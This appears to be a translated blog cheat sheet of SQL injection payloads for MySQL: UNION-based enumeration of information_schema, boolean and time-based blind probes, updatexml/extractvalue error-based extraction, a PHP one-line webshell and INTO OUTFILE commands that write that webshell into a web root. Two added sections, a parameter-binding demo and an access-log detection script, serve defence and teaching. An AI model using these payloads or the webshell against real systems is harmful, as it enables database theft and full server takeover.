SQL injection payloads

/*
 * GET, POST
 * the query result is echoed in the response
 */


UNION-based injection, when the query result is echoed

1. Find the number of columns
' order by 5--+
2. Get the table names
0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
   (equivalent standalone query: SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database())
3. Get the column names
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
   (equivalent standalone query: SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'users')
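As an added example (not code from the original post), the following shows why the ORDER BY and UNION SELECT payloads above work against a query built by string concatenation and stop working once the input is bound as a parameter. SQLite stands in for MySQL, so sqlite_master plays the role of information_schema.tables; the users table, its rows and the function names are constructed for this demo.

```python
"""Added example: the same lookup written with string concatenation and
with parameter binding, probed with the ORDER BY n column-counting and
UNION SELECT schema-enumeration techniques.  SQLite stands in for MySQL
(sqlite_master instead of information_schema.tables); the table, rows and
function names are assumptions constructed for the demo."""
import sqlite3


def make_db():
    """Constructed sample database with a single users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "hunter2"), (2, "bob", "s3cret")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    # The input is spliced into the SQL text, so quotes and keywords in it
    # are parsed as SQL.  This is the pattern the payloads above rely on.
    sql = "SELECT id, username, password FROM users WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    # The input is bound to a placeholder and only ever treated as a value.
    sql = "SELECT id, username, password FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def probe_column_count(conn, lookup, max_cols=6):
    """Replay the ORDER BY n technique against a lookup function.
    Returns the column count revealed by the first n that errors, or None
    if no n ever errors (the input was never parsed as SQL, so nothing leaks)."""
    for n in range(1, max_cols + 1):
        try:
            lookup(conn, "' ORDER BY %d-- " % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


# SQLite analogue of the page's table-name payload (sqlite_master instead of
# information_schema.tables; three columns to match the probed query).
UNION_PAYLOAD = "' UNION SELECT 1, group_concat(name), 3 FROM sqlite_master-- "


def union_leak(conn, lookup):
    """Run the UNION payload through a lookup function: the concatenated
    version returns the schema row, the bound version returns no rows."""
    return lookup(conn, UNION_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    print("columns revealed via concatenation:", probe_column_count(db, lookup_vulnerable))
    print("columns revealed via binding:      ", probe_column_count(db, lookup_safe))
    print("union via concatenation:", union_leak(db, lookup_vulnerable))
    print("union via binding:      ", union_leak(db, lookup_safe))
```

With concatenation the probe stops at ORDER BY 4 and reports three columns, and the UNION payload returns the schema row; with binding the probe never errors and the UNION payload returns nothing, because the whole string is compared against the username column as data.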
/*
 * GET, POST
 * nothing is echoed and no error is shown
 */

Blind injection: the string is usually guessed one character at a time with the following methods.
' and length(database())=8--+
' and ascii(substr(database(),1,1))>N--+
' and ascii(substr(database(),1,1))=N--+
' and ascii(substr(database(),1,1))<N--+

// time-based blind, often combined with boolean-based blind
// used when the page gives no indication at all of whether the condition was true or false
' and if(length(database())=8,sleep(3),null)--+   // sleep runs when the condition is true
' and if(length(database())=8,1,sleep(3))--+      // sleep runs when the condition is false
' or if(length(database())=8,sleep(3),null) or '1'='1

/*
 * GET, POST
 * nothing is echoed, but errors are shown
 * works for SELECT, INSERT, UPDATE and DELETE statements
 */

updatexml() error-based injection
UPDATEXML(XML_document, XPath_string, new_value)
First argument: XML_document, a string, the XML document object (written as Doc in the text)
Second argument: XPath_string, an XPath-format string; if you do not know XPath syntax, tutorials are easy to find online
Third argument: new_value, a string, the data that replaces whatever the XPath expression matches
The value of interest is concatenated into the XPath string, which is invalid, so the database error message echoes it back; 0x7e is '~', used as a delimiter so the result stands out in the message.
payload:
// query the current MySQL version
' and updatexml(1,concat(0x7e,(select @@version)),1) or '1'='1
' or updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '
// query the current database name
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1
// query the table names in the current database
' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) or '1'='1
// query the column names (users table)
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) or '1'='1

Error-based injection in INSERT / UPDATE
' or updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '
Error-based injection in DELETE
' or updatexml(1,concat(0x7e,(select @@version),0x7e),1)

extractvalue()
/* # is a single-line comment
 * no difference from updatexml
 */
' and extractvalue(1,concat(0x7e,(select @@version)))#


/*
 * one-line webshell
 */
PHP: <?php @eval($_GET['string']);?>

// reading and writing files through an SQL injection vulnerability
// with a relative path the file is written into the database's default data folder
1111111' union select 1,2,"<?php @eval($_GET['string']);?>" into outfile "1.php"--+
// an absolute path can also be used; the path here is a Windows one
1111111' union select 1,2,"<?php @eval($_GET['string']);?>" into outfile "D:\\web_security\\1.php"--+
1111111' union select 1,2,"<?php system($_GET['cmd']);?>" into outfile "D:\\web_security\\1.php"--+
// the relative-path form
-1' union select 1,2,"<?php system($_GET['cmd']);?>" into outfile "../../www/sqli/Less-1/2.php"--+
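Every payload family on this page (ORDER BY probing, UNION SELECT, information_schema enumeration, boolean and time-based blind, updatexml/extractvalue error-based, INTO OUTFILE file writes) leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original post, of a small log-triage function that tags each request line with the families it contains. The access-log lines, the `/sqli/Less-1/` path and the `id` parameter are constructed for the demo; the trailing `--+` decodes to `-- ` (MySQL requires whitespace after `--` for the comment to take effect), which is why the function URL-decodes before matching. The file-write family is worth alerting on even when it cannot have succeeded, since INTO OUTFILE only works when the database account holds the FILE privilege and `secure_file_priv` permits the target directory.

```python
"""Added example (not from the original post): tag access-log requests with
the SQL injection payload families listed on this page.  The log lines,
path and parameter names are constructed for the demo."""
import re
from urllib.parse import unquote_plus

# One regex per payload family, applied to the decoded, lower-cased query string.
SIGNATURES = {
    "union_select":   r"\bunion\s+(all\s+)?select\b",
    "order_by_probe": r"\border\s+by\s+\d+",
    "schema_enum":    r"information_schema\.(tables|columns)",
    "boolean_blind":  r"\b(ascii|substr|substring|length)\s*\(",
    "time_blind":     r"\b(sleep|benchmark)\s*\(",
    "error_based":    r"\b(updatexml|extractvalue)\s*\(",
    "file_write":     r"\binto\s+(out|dump)file\b",
    "php_tag":        r"<\?php",
}
COMPILED = {name: re.compile(rx) for name, rx in SIGNATURES.items()}

# Request line of a combined-format access log: method, target, protocol.
LOG_RE = re.compile(r'"(?:GET|POST)\s+(?P<target>\S+)\s+HTTP/[\d.]+"')


def normalize(query):
    """Decode twice (catches double-encoded input), lower-case, drop inline
    comments and collapse whitespace so spacing tricks do not hide a keyword."""
    text = unquote_plus(unquote_plus(query)).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)


def classify(line):
    """Return the set of payload families present in one access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return set()
    query = m.group("target").partition("?")[2]
    if not query:
        return set()
    text = normalize(query)
    return {name for name, rx in COMPILED.items() if rx.search(text)}


def triage(lines):
    """List (line index, sorted families) for every line that matched something."""
    out = []
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            out.append((i, sorted(tags)))
    return out


# Constructed sample log: one benign request followed by one request per family.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /sqli/Less-1/?id=1%27+order+by+5--+ HTTP/1.1" 500 231',
    '10.0.0.5 - - [10/Oct/2023:13:55:44 +0000] "GET /sqli/Less-1/?id=0%27+union+select+1,group_concat(table_name),3'
    '+from+information_schema.tables+where+table_schema=database()--+ HTTP/1.1" 200 1024',
    '10.0.0.5 - - [10/Oct/2023:13:55:50 +0000] "GET /sqli/Less-1/?id=1%27+and+if(length(database())=8,sleep(3),null)--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:55:55 +0000] "GET /sqli/Less-1/?id=1%27+and+updatexml(1,concat(0x7e,(select+@@version)),1)--+ HTTP/1.1" 200 640',
    '10.0.0.5 - - [10/Oct/2023:13:56:02 +0000] "GET /sqli/Less-1/?id=-1%27+union+select+1,2,%22%3C%3Fphp+echo+1%3B%3F%3E%22'
    '+into+outfile+%22/var/www/x.php%22--+ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for index, families in triage(SAMPLE_LOG):
        print(index, ", ".join(families))
```

The signatures are deliberately keyword-level: they are meant for triage of a log after the fact, not as a blocking filter, and the lead-in's decoding step matters because the same payload can arrive with `+`, `%20` or double encoding. Pairing a `time_blind` hit with the response time recorded by the server, or a `file_write` hit with a new file under the web root, is what turns a tag into an incident.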


Source: www.cnblogs.com/jiersixi/p/11784769.html